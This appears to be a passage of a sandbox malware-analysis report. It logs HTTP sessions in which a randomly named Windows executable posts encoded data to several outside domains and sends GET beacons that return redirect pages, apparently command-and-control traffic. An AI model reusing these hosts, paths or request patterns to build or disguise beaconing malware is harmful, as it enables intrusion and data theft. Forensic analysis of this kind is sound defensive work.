                                                                                                      Nov 18, 2024 13:54:32.859011889 CET | 484 | OUT | GET /z6yq/?GLvL=i6ILStp&3Vh=IJnefPGbAG2krK+EKqL7a6PcsOn2aPK/WZ9HL1Dz7m/jpK3dV9N7lfXoIgTZBqqJT6Dwk+2xUIDeSWpocJA6c4hKTPFrc23hpH01F3StVZ8qYYY4ti7AYH4NQlXIhw0jjg== HTTP/1.1
                                                                                                      Host: www.newegg.club
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Nov 18, 2024 13:54:33.513044119 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                      Server: nginx
                                                                                                      Date: Mon, 18 Nov 2024 12:54:33 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 548
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      9 | 192.168.2.5 | 49991 | 75.2.103.23 | 80 | 1896 | C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Nov 18, 2024 13:54:38.748069048 CET | 734 | OUT | POST /z0cc/ HTTP/1.1
                                                                                                      Host: www.urssaf.pro
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 204
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.urssaf.pro
                                                                                                      Referer: http://www.urssaf.pro/z0cc/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 72 4e 61 49 35 33 32 42 38 46 67 36 34 4c 46 75 79 33 5a 6b 51 53 46 79 6d 73 78 36 52 4e 49 36 54 53 6a 4d 62 67 53 43 6a 76 35 7a 48 69 32 67 58 39 38 37 30 46 56 38 4c 47 6d 50 44 59 6f 79 55 4d 6f 56 30 50 51 6c 61 35 45 74 64 53 68 56 46 79 79 43 6f 7a 39 69 6c 4c 41 73 47 4d 4e 68 2f 66 2b 55 2f 70 75 4a 37 56 2f 4a 78 5a 37 32 43 73 36 71 6a 77 7a 5a 44 68 4c 75 51 54 6d 6a 4e 45 68 4f 4a 59 4f 42 48 59 43 4f 61 54 39 31 58 72 43 58 6c 4a 41 41 50 4a 4c 44 43 33 61 65 6f 6e 2f 65 6f 61 70 39 30 36 54 49 4e 61 43 75 32 67 39 4d 30 66 7a 69 4e 55 6f 2b 5a 6b 62 53 31 6a 4b 6e 6f 50 49 3d
                                                                                                      Data Ascii: 3Vh=rNaI532B8Fg64LFuy3ZkQSFymsx6RNI6TSjMbgSCjv5zHi2gX9870FV8LGmPDYoyUMoV0PQla5EtdShVFyyCoz9ilLAsGMNh/f+U/puJ7V/JxZ72Cs6qjwzZDhLuQTmjNEhOJYOBHYCOaT91XrCXlJAAPJLDC3aeon/eoap906TINaCu2g9M0fziNUo+ZkbS1jKnoPI=


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      10 | 192.168.2.5 | 49992 | 75.2.103.23 | 80 | 1896 | C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Nov 18, 2024 13:54:41.299343109 CET | 754 | OUT | POST /z0cc/ HTTP/1.1
                                                                                                      Host: www.urssaf.pro
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 224
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.urssaf.pro
                                                                                                      Referer: http://www.urssaf.pro/z0cc/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 72 4e 61 49 35 33 32 42 38 46 67 36 34 6f 74 75 70 55 78 6b 45 43 46 7a 71 4d 78 36 62 74 49 32 54 53 76 4d 62 68 6d 53 69 5a 70 7a 48 44 47 67 55 38 38 37 35 6c 56 38 44 6d 6d 4b 65 49 6f 35 55 4d 6c 6d 30 4e 55 6c 61 35 34 74 64 54 52 56 47 42 61 4e 70 6a 39 38 74 72 41 75 4c 73 4e 68 2f 66 2b 55 2f 70 36 7a 37 52 72 4a 79 74 2f 32 43 4e 36 6c 2f 67 7a 61 43 68 4c 75 61 7a 6d 5a 4e 45 68 67 4a 61 32 37 48 65 4f 4f 61 51 70 31 4f 61 43 55 71 4a 41 61 42 70 4b 70 53 33 48 47 68 6e 7a 6c 6a 4a 6f 4b 6b 37 72 4f 4d 73 7a 45 73 43 31 6b 6e 2f 66 61 64 48 67 4a 49 55 36 37 76 41 61 58 32 59 66 46 41 4d 65 36 67 44 41 6f 46 30 49 4b 45 49 67 75 35 4e 2b 58
                                                                                                      Data Ascii: 3Vh=rNaI532B8Fg64otupUxkECFzqMx6btI2TSvMbhmSiZpzHDGgU8875lV8DmmKeIo5UMlm0NUla54tdTRVGBaNpj98trAuLsNh/f+U/p6z7RrJyt/2CN6l/gzaChLuazmZNEhgJa27HeOOaQp1OaCUqJAaBpKpS3HGhnzljJoKk7rOMszEsC1kn/fadHgJIU67vAaX2YfFAMe6gDAoF0IKEIgu5N+X


                                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                      11          192.168.2.5  49993        75.2.103.238    80                1896  C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      Timestamp                            Bytes transferred  Direction  Data
                                                                                                      Nov 18, 2024 13:54:43.854106903 CET  1771               OUT        POST /z0cc/ HTTP/1.1
                                                                                                      Host: www.urssaf.pro
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 1240
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.urssaf.pro
                                                                                                      Referer: http://www.urssaf.pro/z0cc/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 72 4e 61 49 35 33 32 42 38 46 67 36 34 6f 74 75 70 55 78 6b 45 43 46 7a 71 4d 78 36 62 74 49 32 54 53 76 4d 62 68 6d 53 69 5a 68 7a 47 78 65 67 57 66 55 37 34 6c 56 38 4a 47 6d 4c 65 49 6f 6b 55 4d 4e 71 30 4e 59 50 61 38 30 74 66 78 4a 56 44 77 61 4e 6e 6a 39 38 68 4c 41 6a 47 4d 4e 34 2f 5a 65 51 2f 71 43 7a 37 52 72 4a 79 72 54 32 46 63 36 6c 39 67 7a 5a 44 68 4c 79 51 54 6e 58 4e 45 34 64 4a 61 7a 47 47 75 75 4f 61 32 4a 31 56 49 71 55 6a 4a 41 45 43 70 4b 78 53 33 4c 6e 68 6e 75 4c 6a 4b 30 67 6b 38 50 4f 4e 4c 72 63 77 77 74 39 38 2f 50 36 4f 30 67 38 5a 51 6d 67 75 52 65 58 33 35 37 78 4b 50 33 53 31 45 64 73 46 77 78 6a 65 63 67 6c 34 34 69 44 35 6d 30 63 2f 46 46 68 56 52 41 72 76 38 32 53 4a 6e 50 33 33 6e 55 4b 70 58 70 37 5a 39 73 4f 34 32 61 61 6e 61 6a 61 33 70 72 62 74 77 75 38 76 38 73 43 58 4e 39 48 6b 36 61 37 7a 43 62 67 2f 6b 68 66 54 70 38 4c 42 66 71 70 39 74 67 50 78 63 71 6c 57 4b 50 45 43 75 4a 31 77 62 46 31 33 79 37 4d 74 74 76 53 36 2f 66 7a 55 36 50 30 55 4b [TRUNCATED]
                                                                                                      Data Ascii: 3Vh= [TRUNCATED]


                                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                      12          192.168.2.5  49994        75.2.103.238    80                1896  C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      Timestamp                            Bytes transferred  Direction  Data
                                                                                                      Nov 18, 2024 13:54:46.388480902 CET  483                OUT        GET /z0cc/?3Vh=mPyo6D+wxSg6wqdV9nk/OSYqhM94LpUyTCqRRij/kapmOQ+LaukUhnJqBEfRM/o2CL136rw3QccrDBsmMWKXgAkLupEcDtZ658id8aig7ErI/LfAFvSz4HSXFzvHaTHHWA==&GLvL=i6ILStp HTTP/1.1
                                                                                                      Host: www.urssaf.pro
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Nov 18, 2024 13:54:47.012469053 CET  404                IN         HTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Mon, 18 Nov 2024 12:54:46 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 264
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 33 56 68 3d 6d 50 79 6f 36 44 2b 77 78 53 67 36 77 71 64 56 39 6e 6b 2f 4f 53 59 71 68 4d 39 34 4c 70 55 79 54 43 71 52 52 69 6a 2f 6b 61 70 6d 4f 51 2b 4c 61 75 6b 55 68 6e 4a 71 42 45 66 52 4d 2f 6f 32 43 4c 31 33 36 72 77 33 51 63 63 72 44 42 73 6d 4d 57 4b 58 67 41 6b 4c 75 70 45 63 44 74 5a 36 35 38 69 64 38 61 69 67 37 45 72 49 2f 4c 66 41 46 76 53 7a 34 48 53 58 46 7a 76 48 61 54 48 48 57 41 3d 3d 26 47 4c 76 4c 3d 69 36 49 4c 53 74 70 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?3Vh=mPyo6D+wxSg6wqdV9nk/OSYqhM94LpUyTCqRRij/kapmOQ+LaukUhnJqBEfRM/o2CL136rw3QccrDBsmMWKXgAkLupEcDtZ658id8aig7ErI/LfAFvSz4HSXFzvHaTHHWA==&GLvL=i6ILStp"}</script></head></html>


                                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                      13          192.168.2.5  49995        3.33.130.190    80                1896  C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      Timestamp                            Bytes transferred  Direction  Data
                                                                                                      Nov 18, 2024 13:54:52.064824104 CET  755                OUT        POST /pd34/ HTTP/1.1
                                                                                                      Host: www.livelovechat.live
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 204
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.livelovechat.live
                                                                                                      Referer: http://www.livelovechat.live/pd34/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 48 35 30 62 46 7a 41 39 69 7a 59 4c 41 57 32 59 6e 73 69 38 32 54 54 4b 56 35 64 76 6f 6b 39 77 69 49 52 49 64 46 4d 69 69 42 66 72 71 56 41 2b 71 51 63 7a 5a 54 33 37 55 47 4e 6d 77 5a 75 35 42 4f 46 6b 44 6a 77 54 47 62 37 33 2b 67 65 76 45 53 43 34 31 4a 42 67 4b 4e 69 62 74 59 51 4e 30 6a 42 6f 64 69 47 74 77 41 38 4e 53 6b 72 35 77 51 36 39 57 33 76 67 64 35 57 48 52 52 77 67 4d 71 57 68 44 74 79 41 47 73 57 33 4e 6b 4c 62 6c 34 75 7a 31 4e 72 78 45 2f 46 68 45 5a 4c 51 67 74 45 73 37 44 64 2b 41 31 34 6e 4f 39 37 64 65 2b 71 6e 4a 36 73 53 49 69 53 30 41 74 4a 6e 6f 37 5a 46 53 57 77 3d
                                                                                                      Data Ascii: 3Vh=H50bFzA9izYLAW2Ynsi82TTKV5dvok9wiIRIdFMiiBfrqVA+qQczZT37UGNmwZu5BOFkDjwTGb73+gevESC41JBgKNibtYQN0jBodiGtwA8NSkr5wQ69W3vgd5WHRRwgMqWhDtyAGsW3NkLbl4uz1NrxE/FhEZLQgtEs7Dd+A14nO97de+qnJ6sSIiS0AtJno7ZFSWw=


                                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                      14          192.168.2.5  49996        3.33.130.190    80                1896  C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      Timestamp                            Bytes transferred  Direction  Data
                                                                                                      Nov 18, 2024 13:54:54.616808891 CET  775                OUT        POST /pd34/ HTTP/1.1
                                                                                                      Host: www.livelovechat.live
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 224
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.livelovechat.live
                                                                                                      Referer: http://www.livelovechat.live/pd34/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 48 35 30 62 46 7a 41 39 69 7a 59 4c 42 31 75 59 67 4c 2b 38 7a 7a 54 46 51 35 64 76 68 45 39 72 69 49 4e 49 64 45 49 4d 69 7a 37 72 70 33 59 2b 70 55 77 7a 59 54 33 37 62 6d 4e 6a 75 70 76 55 42 4f 34 54 44 6a 38 54 47 62 76 33 2b 68 75 76 46 68 71 37 36 35 42 69 4c 39 69 5a 7a 6f 51 4e 30 6a 42 6f 64 69 53 58 77 41 6b 4e 54 56 62 35 77 31 4f 36 62 58 76 6a 4b 4a 57 48 61 78 77 6b 4d 71 57 54 44 70 7a 6c 47 76 75 33 4e 68 76 62 6c 4e 53 30 36 4e 72 7a 5a 76 46 79 44 73 36 4a 6c 64 78 6d 37 43 55 74 65 6b 59 68 47 72 4b 33 45 63 69 50 61 61 41 71 59 78 61 44 52 64 6f 4f 79 59 4a 31 4d 42 6e 46 2b 53 6c 74 33 68 37 76 61 55 54 56 64 67 47 48 57 6c 67 52
                                                                                                      Data Ascii: 3Vh=H50bFzA9izYLB1uYgL+8zzTFQ5dvhE9riINIdEIMiz7rp3Y+pUwzYT37bmNjupvUBO4TDj8TGbv3+huvFhq765BiL9iZzoQN0jBodiSXwAkNTVb5w1O6bXvjKJWHaxwkMqWTDpzlGvu3NhvblNS06NrzZvFyDs6Jldxm7CUtekYhGrK3EciPaaAqYxaDRdoOyYJ1MBnF+Slt3h7vaUTVdgGHWlgR


                                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                      15          192.168.2.5  49997        3.33.130.190    80                1896  C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      Timestamp                            Bytes transferred  Direction  Data
                                                                                                      Nov 18, 2024 13:54:57.172456980 CET  1792               OUT        POST /pd34/ HTTP/1.1
                                                                                                      Host: www.livelovechat.live
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 1240
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.livelovechat.live
                                                                                                      Referer: http://www.livelovechat.live/pd34/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 48 35 30 62 46 7a 41 39 69 7a 59 4c 42 31 75 59 67 4c 2b 38 7a 7a 54 46 51 35 64 76 68 45 39 72 69 49 4e 49 64 45 49 4d 69 7a 7a 72 70 43 4d 2b 70 7a 6b 7a 62 54 33 37 46 57 4e 69 75 70 75 57 42 4f 51 66 44 6a 42 6f 47 65 72 33 2f 47 47 76 43 51 71 37 74 4a 42 69 4f 4e 69 55 74 59 51 63 30 6e 74 53 64 69 43 58 77 41 6b 4e 54 57 44 35 32 67 36 36 49 48 76 67 64 35 57 4c 52 52 77 63 4d 71 4f 44 44 70 6e 62 48 66 4f 33 4d 48 50 62 32 4c 47 30 6c 39 72 31 61 76 45 76 44 73 2b 73 6c 64 63 66 37 43 68 32 65 6a 73 68 58 76 54 4f 66 49 57 48 4d 61 64 47 63 69 61 47 42 36 73 65 33 35 5a 61 4e 6a 6e 33 33 53 4a 48 68 52 48 44 54 41 61 45 4d 33 32 6f 64 78 45 61 41 41 65 32 39 35 49 68 6c 56 34 67 56 30 46 50 55 53 63 32 59 66 74 4c 63 2b 6f 4c 38 32 32 79 6f 4b 6d 6d 31 73 54 73 67 4f 49 44 2f 52 71 77 4c 4e 59 4a 38 30 53 46 71 72 69 4b 2b 42 41 32 34 57 78 36 56 33 46 58 55 35 49 42 70 5a 65 46 52 54 78 42 56 7a 55 65 46 75 31 42 2f 57 68 66 32 38 4a 46 2b 37 79 52 6f 79 73 68 70 55 6b 47 72 68 [TRUNCATED]
                                                                                                      Data Ascii: 3Vh= [TRUNCATED]


                                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                      16          192.168.2.5  49998        3.33.130.190    80                1896  C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      Timestamp                            Bytes transferred  Direction  Data
                                                                                                      Nov 18, 2024 13:54:59.718556881 CET  490                OUT        GET /pd34/?GLvL=i6ILStp&3Vh=K7c7GG4YoBhyIH2FkZv47jvyXIQu7BF3gr9nfk9bshiJsGEWrwQzORTrdncggfezCYBzamNCDbDGvy7dK0Wg3s8vNv6rtr8S8iFqSDmB+QkqQHbk31GwTFmydpKFayxrIg== HTTP/1.1
                                                                                                      Host: www.livelovechat.live
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Nov 18, 2024 13:55:00.342716932 CET  404                IN         HTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Mon, 18 Nov 2024 12:55:00 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 264
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 47 4c 76 4c 3d 69 36 49 4c 53 74 70 26 33 56 68 3d 4b 37 63 37 47 47 34 59 6f 42 68 79 49 48 32 46 6b 5a 76 34 37 6a 76 79 58 49 51 75 37 42 46 33 67 72 39 6e 66 6b 39 62 73 68 69 4a 73 47 45 57 72 77 51 7a 4f 52 54 72 64 6e 63 67 67 66 65 7a 43 59 42 7a 61 6d 4e 43 44 62 44 47 76 79 37 64 4b 30 57 67 33 73 38 76 4e 76 36 72 74 72 38 53 38 69 46 71 53 44 6d 42 2b 51 6b 71 51 48 62 6b 33 31 47 77 54 46 6d 79 64 70 4b 46 61 79 78 72 49 67 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?GLvL=i6ILStp&3Vh=K7c7GG4YoBhyIH2FkZv47jvyXIQu7BF3gr9nfk9bshiJsGEWrwQzORTrdncggfezCYBzamNCDbDGvy7dK0Wg3s8vNv6rtr8S8iFqSDmB+QkqQHbk31GwTFmydpKFayxrIg=="}</script></head></html>


                                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                      17          192.168.2.5  49999        203.161.49.193  80                1896  C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      Timestamp                            Bytes transferred  Direction  Data
                                                                                                      Nov 18, 2024 13:55:05.421433926 CET  752                OUT        POST /tv3i/ HTTP/1.1
                                                                                                      Host: www.inspires.website
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 204
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.inspires.website
                                                                                                      Referer: http://www.inspires.website/tv3i/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 6c 79 43 74 69 6b 76 44 67 37 77 30 62 76 66 73 4b 74 39 78 64 6d 72 58 37 46 31 67 46 6f 36 52 67 73 42 2f 75 5a 67 65 62 72 51 7a 66 63 6f 71 67 59 53 4f 4f 49 77 70 6b 52 53 51 6f 39 78 68 4f 34 49 49 42 30 36 77 6b 64 6e 65 39 32 62 4d 4b 34 39 58 6f 41 58 57 36 70 49 62 4f 58 6c 71 76 34 50 38 41 4a 71 71 71 6b 74 47 69 6e 47 52 70 7a 2b 4a 6d 39 42 67 46 55 52 36 55 47 6e 5a 62 59 65 44 72 2b 4d 44 2b 6e 32 63 6b 77 63 2b 5a 73 43 31 70 6c 75 39 77 64 69 5a 50 77 74 37 64 61 78 34 44 42 2b 4f 77 62 4c 6a 35 42 59 45 78 59 43 69 57 49 4d 47 53 72 39 54 36 6a 38 39 78 67 6f 42 46 6f 55 3d
                                                                                                      Data Ascii: 3Vh=lyCtikvDg7w0bvfsKt9xdmrX7F1gFo6RgsB/uZgebrQzfcoqgYSOOIwpkRSQo9xhO4IIB06wkdne92bMK49XoAXW6pIbOXlqv4P8AJqqqktGinGRpz+Jm9BgFUR6UGnZbYeDr+MD+n2ckwc+ZsC1plu9wdiZPwt7dax4DB+OwbLj5BYExYCiWIMGSr9T6j89xgoBFoU=
                                                                                                      Nov 18, 2024 13:55:06.129165888 CET  533                IN         HTTP/1.1 404 Not Found
                                                                                                      Date: Mon, 18 Nov 2024 12:55:06 GMT
                                                                                                      Server: Apache
                                                                                                      Content-Length: 389
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
